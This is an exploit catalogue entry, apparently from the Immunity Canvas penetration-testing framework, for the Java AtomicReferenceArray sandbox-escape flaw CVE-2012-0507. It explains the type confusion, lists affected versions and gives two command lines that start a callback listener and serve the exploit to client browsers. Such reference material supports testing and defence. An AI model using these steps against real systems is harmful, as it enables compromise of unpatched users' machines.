Immunity Canvas: JAVA_ATOMICREFERENCEARRAY

2012-06-07 22:55:00
Immunity Canvas
exploitlist.immunityinc.com
30

EPSS: 0.967 (Percentile: 99.7%)

Name: java_AtomicReferenceArray
CVE: CVE-2012-0507 Exploit Pack
VENDOR: Sun
Notes:
There is a type confusion vulnerability in the java.util.concurrent.atomic.AtomicReferenceArray class.
When a new instance of AtomicReferenceArray is created, the array type has to be specified; however, the AtomicReferenceArray.set method does not properly check the type of the object being inserted.
This vulnerability can then be combined with some reflection tricks to disable the Java Security Manager and escape the sandbox.

Affected versions:
- JDK and JRE 7 Update 2 and earlier
- JDK and JRE 6 Update 30 and earlier
- JDK and JRE 5.0 Update 33 and earlier
- SDK and JRE 1.4.2_35 and earlier

Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 1
- Windows 7 SP1 with JDK/JRE 6 update 29
- Windows 7 SP1 with JDK/JRE 5 update 22
- Windows XP SP3 with JDK/JRE 7 and 7 update 1

To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_AtomicReferenceArray -O allowed_recon_modules:js_recon -O auto_detect_exploits:0

Repeatability: Infinite (client side - no crash)
References: http://weblog.ikvm.net/CommentView.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3
http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html
Date public: 02/14/2012